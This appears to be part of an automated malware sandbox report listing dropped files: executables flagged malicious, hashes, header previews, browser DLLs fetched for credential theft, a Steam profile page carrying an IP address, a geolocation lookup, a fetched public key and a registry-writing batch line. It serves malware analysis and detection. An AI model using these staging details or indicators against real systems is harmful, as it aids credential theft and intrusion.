Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	751104
Entropy (8bit):	7.759444131721117
Encrypted:	false
SSDEEP:	12288:unvpi0XtAWoEn3O4WsiCIJdbUa0OWv4f5GWzH9MgInKa8fbM:unsk+4WxCIJJ6ef5PugIniTM
MD5:	3EEDC2AE680453B8CA3B23FD15F529A7
SHA1:	4B1CB1070C23BEA1ABDE90A6329CBF45059E8AE4
SHA-256:	9BDB0941FB313CB0726068C73E28A31CFCDFD245E56666E6C86D78918EA85AEC
SHA-512:	E9075B16347404B61DF5698BB055284F94F686ED318EA6F71B93E924AA25E19B2E27F516909EE9787B6BF9925320403DFF6D5825B3199EDBF2F46608A4E57D9B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L...%9(d.....................\.......C............@..........................`......EO.......................................j..P.......h...........................Tj..............................`_..@...............l............................text............................... ..`.rdata..Hr.......t..................@..@.data...`........F...\..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.005546164903409
Encrypted:	false
SSDEEP:	768:b7F9oInjxkCG2zOPjjk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3Ya:hdkqzgrJvzgxhGiwGGnS5mFwiKuiDl+a
MD5:	4DFB5843F6F9939E80A79C07E6B5B97C
SHA1:	3E986B032820127F2733268CD2E400167BC11FAE
SHA-256:	9C5B1D7E72D5874D7D7CCADAF96CD79C9EAF6C54A6A632B491BCC13C97F84099
SHA-512:	09A394623FC410E7ADF00B187A23CD393862B2AFF962BC2690D2552E9836DE975AEC03241A0F3014DE54580C02A910628B4B13B4E88593F3C4EFD372AFB9FE5A
Malicious:	false
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108216
Entropy (8bit):	4.007838653921864
Encrypted:	false
SSDEEP:	768:ZzF9oonjxkUGgzOPjjk0+ACWHpfnzfNELYduJxP7pxoZsR1v9JNtFOOmdypfR3YO:LdkSzgrJvzMjhGiwGGnA3mFkiKmi1l+a
MD5:	D3F1BF1BEA97AC0AB7111B97879E69FB
SHA1:	6B811E6584EC10E303A066D7F944F4EFE99E778A
SHA-256:	94FB7635706203A4409E1EFD33B7F3B641A6835C77BD5DF9167EE29F91E5EC4A
SHA-512:	5875BE2961DB934062587A7836C282705A91BD64D85B2B5489B7F7AAF39188A6156F28AF338EEF34F68B31C50268081F3184FF08FF3D5D99ADFE48D9A1C9B165
Malicious:	false
Preview:	....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199689717899[1].htm

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	35682
Entropy (8bit):	5.380796323952844
Encrypted:	false
SSDEEP:	768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2S1:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxB
MD5:	FE777EE855868A4D298A66FFDC3CFC85
SHA1:	BB8D28AC74655FCA4E836CA664D502EAA3A2BAB0
SHA-256:	3BD9873A0DD4A5DE643332E412088BBB756D3374956948B7302EFD1A5059934A
SHA-512:	ED35C87709C7821EB35C36D11DA656D6825078C73B175D96F6FC78024D753DDA6FC3CCD05442880C31C5CF0C99F1353C936C4B8943FC647F9758D7E68087B66A
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	232448
Entropy (8bit):	7.222439676177051
Encrypted:	false
SSDEEP:	3072:xxr0DOihufZk6+IEs79tztiUKkfPucceIfEgSbMpOrq+nsu9wYS:x0oe6xBtEkfPuckcgSJ5nbCY
MD5:	4F54B83888A62CDD3584C0A0FEE970D8
SHA1:	AA281745AC08596281522253FD1A11CB57995B48
SHA-256:	1932C3563AC01B8278F40493EF7D3F78413F4D5E86B9D1E0483001BB07654BC2
SHA-512:	B370130012936E3DBB033FC53618F5134041841781C37E664DAADBEE82AE900933BA4A97354C0565F8531E31EEC62AC4DB06398E3719A18EFA4D3C93737D78A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.*.uuD.uuD.uuD.x'..muD.x'...uD.x'..RuD.\|...ruD.uuE..uD....tuD.x'..tuD....tuD.RichuuD.................PE..L....._e.............................6............@.................................\6.......................................P..P.......(w...........................Q..............................`F..@...............\............................text............................... ..`.rdata...h.......j..................@..@.data...@ ...`.......J..............@....rsrc...(w.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.653613298613219
Encrypted:	false
SSDEEP:	12:YdYwpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdXHD+CtrRQVctrRQVzRZQ3htrRQV/m0
MD5:	12B97C50A3579B5DCC80CC67A1204294
SHA1:	530B7C0DAA05B36B7C00CE1C16F9E6D9AAB27B1B
SHA-256:	B8EF550D8DD485A0809E6E5EAE64F57C1E77410E3B97EF446927CC453952638A
SHA-512:	BFB9D84A3DC2E7A6F98C16481A6D945628C04197C8FDAC1EE95D7DF6E1A273609E9B32C7E540D3EA9BC9F22D375E8361177E836825E228C8267AF41863D092E9
Malicious:	false
Preview:	{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\get[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	557
Entropy (8bit):	6.017036102656592
Encrypted:	false
SSDEEP:	12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
MD5:	C4C2A009303D43379B6505DAE754CB92
SHA1:	FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
SHA-256:	F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
SHA-512:	C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\get[2].htm

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	557
Entropy (8bit):	6.017036102656592
Encrypted:	false
SSDEEP:	12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
MD5:	C4C2A009303D43379B6505DAE754CB92
SHA1:	FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
SHA-256:	F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
SHA-512:	C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\geo[1].json

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.653613298613219
Encrypted:	false
SSDEEP:	12:YdYwpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdXHD+CtrRQVctrRQVzRZQ3htrRQV/m0
MD5:	12B97C50A3579B5DCC80CC67A1204294
SHA1:	530B7C0DAA05B36B7C00CE1C16F9E6D9AAB27B1B
SHA-256:	B8EF550D8DD485A0809E6E5EAE64F57C1E77410E3B97EF446927CC453952638A
SHA-512:	BFB9D84A3DC2E7A6F98C16481A6D945628C04197C8FDAC1EE95D7DF6E1A273609E9B32C7E540D3EA9BC9F22D375E8361177E836825E228C8267AF41863D092E9
Malicious:	false
Preview:	{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Windows[2].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	679
Entropy (8bit):	5.165420664591353
Encrypted:	false
SSDEEP:	12:YWgc2TGBdeH+aBdeVAWRVtmXCH+2yrZMAdrKC8K/y8kEUq1HLxycXNNZW3c3Z:Yzc2TYAHtoAWRVMCHt0drc6UET
MD5:	A8107106BEAEE159CABC5C8B05BC160B
SHA1:	E6CCAF93C68BA8263D9E763C103E92D2664E519B
SHA-256:	157F4F7E00941EE52B08537605AFFB5728A754348E66357403F84874CC45CAE9
SHA-512:	8C82AB2BF541A32025C0C29A158734B869C4E6A8485ABB50076E267CEDC00DD42379B02F5C9F693AA7159A9968379382F0926AD96D6CC1AF2E3672E10238D17E
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"66523c64-43bd-476e-8fd7-fcd8e088b9c4","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"66523c64-43bd-476e-8fd7-fcd8e088b9c4\|2024-05-25T19:30:44.0114600Z\|fabric_msn\|ESU\|News_611"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false},"isPartial":false}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C002.bat

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	77
Entropy (8bit):	4.90323175550411
Encrypted:	false
SSDEEP:	3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
MD5:	55CC761BF3429324E5A0095CAB002113
SHA1:	2CC1EF4542A4E92D4158AB3978425D517FAFD16D
SHA-256:	D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
SHA-512:	33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
Malicious:	false
Preview:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\user\AppData\Local\Temp\C01.bat

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	77
Entropy (8bit):	4.90323175550411
Encrypted:	false
SSDEEP:	3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
MD5:	55CC761BF3429324E5A0095CAB002113
SHA1:	2CC1EF4542A4E92D4158AB3978425D517FAFD16D
SHA-256:	D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
